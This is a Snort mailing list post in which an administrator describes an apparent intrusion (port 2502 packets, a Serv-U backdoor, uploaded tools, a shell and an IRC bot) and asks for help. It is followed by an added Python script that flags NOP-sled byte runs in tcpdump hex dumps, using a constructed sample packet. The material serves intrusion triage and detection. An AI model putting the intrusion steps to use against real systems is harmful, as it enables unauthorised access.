Snort mailing list archives

Compromising Packet...


From: "Dusty Hall" <halljer () auburn edu>
Date: Mon, 26 Jan 2004 11:14:45 -0600

I'm curious to know if anyone has seen anything like this before.  A few
packets were sent to port 2502... a few seconds later port 2503 was
opened up with Serv-U installed; tlist.exe and kill.exe were uploaded
and then they had a shell.  After that it looks like "SUB0T" was set up;
the IRC channel and pass were captured in other packets.  It's supposedly an
XP system with current patches.

Any help would be greatly appreciated.

Thanks,


-Dusty



This is the first packet Snort captured:

05:26:23.679984 x.x.x.x.3882 > x.x.x.x.2502: P 945899367:945900747(1380) ack 413273664 win 65535 (DF)
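A small triage script for tcpdump -X style dumps like the one posted, added here as an example (not code from the original message): it reassembles the bytes, skips the IPv4 and TCP headers using the IHL and data-offset fields, and measures the longest run of 0x90 bytes in the payload, the x86 NOP-sled pattern that Snort's shellcode rules watch for. The embedded dump is constructed to match the layout of the capture, not the real bytes; the 192.0.2.x addresses are documentation addresses and the checksums are left zero.

```python
import re
# Dump line: 0xOFFSET, hex words separated by single spaces, optional ASCII column after 2+ spaces.
_DUMP_LINE = re.compile(
    r"^\s*0x([0-9a-fA-F]{4}):?\s+"
    r"((?:[0-9a-fA-F]{4} )*(?:[0-9a-fA-F]{4}|[0-9a-fA-F]{2}))(?:\s{2,}.*)?\s*$")

# Constructed sample in tcpdump -X layout (not the post's bytes): 192.0.2.10:3882 -> 192.0.2.20:2502.
SAMPLE_DUMP = """\
05:26:23.679984 192.0.2.10.3882 > 192.0.2.20.2502: P 1:25(24) ack 2 win 65535 (DF)
0x0000   4500 0040 0001 4000 4006 0000 c000 020a        E..@..@.@.......
0x0010   c000 0214 0f2a 09c6 0000 0001 0000 0002        .....*..........
0x0020   5018 ffff 0000 0000 00c3 9090 9090 9090        P...............
0x0030   9090 9090 9090 9090 eb05 9090 9090 90c3        ................
"""

def parse_hexdump(text):
    """Concatenate the hex words of every dump line; summary and ASCII-only lines are skipped."""
    data = bytearray()
    for line in text.splitlines():
        m = _DUMP_LINE.match(line)
        if not m:
            continue
        if int(m.group(1), 16) != len(data):
            raise ValueError("non-contiguous dump at offset 0x" + m.group(1))
        data += bytes.fromhex(m.group(2).replace(" ", ""))
    return bytes(data)

def tcp_payload(pkt):
    """Skip the IPv4 header (IHL) and TCP header (data offset); return (src_port, dst_port, payload)."""
    if len(pkt) < 40 or pkt[0] >> 4 != 4 or pkt[9] != 6:
        raise ValueError("expected an IPv4/TCP packet")
    tcp = pkt[(pkt[0] & 0x0F) * 4:]
    sport, dport = int.from_bytes(tcp[:2], "big"), int.from_bytes(tcp[2:4], "big")
    return sport, dport, tcp[(tcp[12] >> 4) * 4:]

def longest_nop_run(payload, nop=0x90):
    """Return (length, start_offset) of the longest run of the NOP byte; (0, -1) if none."""
    best, cur = (0, -1), 0
    for i, b in enumerate(payload):
        cur = cur + 1 if b == nop else 0
        if cur > best[0]:
            best = (cur, i - cur + 1)
    return best

def analyze(dump_text, threshold=8):
    """(src_port, dst_port, payload_len, nop_run_len, nop_run_offset, suspect) for one dumped packet."""
    sport, dport, payload = tcp_payload(parse_hexdump(dump_text))
    run, at = longest_nop_run(payload)
    return sport, dport, len(payload), run, at, run >= threshold
```

The threshold is a tuning knob: legitimate binary protocols rarely carry long 0x90 runs, but a hit is a reason to look at the rest of the payload, not a verdict on its own.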






